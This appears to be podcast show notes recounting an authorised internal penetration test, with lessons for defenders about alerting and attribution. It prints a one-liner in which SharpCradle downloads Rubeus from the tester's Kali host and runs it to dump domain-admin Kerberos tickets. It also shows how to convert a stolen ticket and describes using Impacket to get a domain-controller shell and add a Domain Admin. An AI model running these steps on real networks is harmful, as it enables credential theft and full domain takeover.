SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!
Hey friends, I dare declare this to be my favorite tale of internal pentest pwnage so far. Why? Because the episode features:
- Great blue team tools alerting our customer to a lot of the stuff we were doing
- An EDR that we tried to beat up (but it beat us up instead)
- SharpGPOAbuse which we talked about extensively last week
- Separation of "everyday" accounts from privileged accounts
- Multi-factor authentication bypass!
- Some delicious findings in GPOs thanks to Ryan Hausec’s great two part series (1 and 2). If you’re not sure if you’re vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation.
The final cherry on top was a new attack another pentester taught me. Use a combination of SharpCradle and Rubeus to steal logged in DA creds:
SharpCradle.exe -w https://your.kali.box.ip/Rubeus.exe dump /service:krbtgt /nowrap
This will give you a TGT (base64 encoded) for active logon sessions to the box. So if a DA is logged in, you can snag their TGT and then convert that into a .kirbi file on your Kali box with:
echo "LooooonnnnnggggggTicketStriiiiiiiiiiinnnngggg" | base64 -d > BobTheDomainAdmin.kirb
Convert the .kirbi file to a .ccache file with ticket converter. Then you can use Impacket tools to use/abuse that access to your heart’s delight.
We ended up using Impacket to pop a shell on a DC and add a low-priv account to DA. The interesting thing is that the alert the blue team received essentially said "The DC itself added the user to the DA group" – the alert did not have attribution to the user whose ticket we stole! Good tip for future pentests!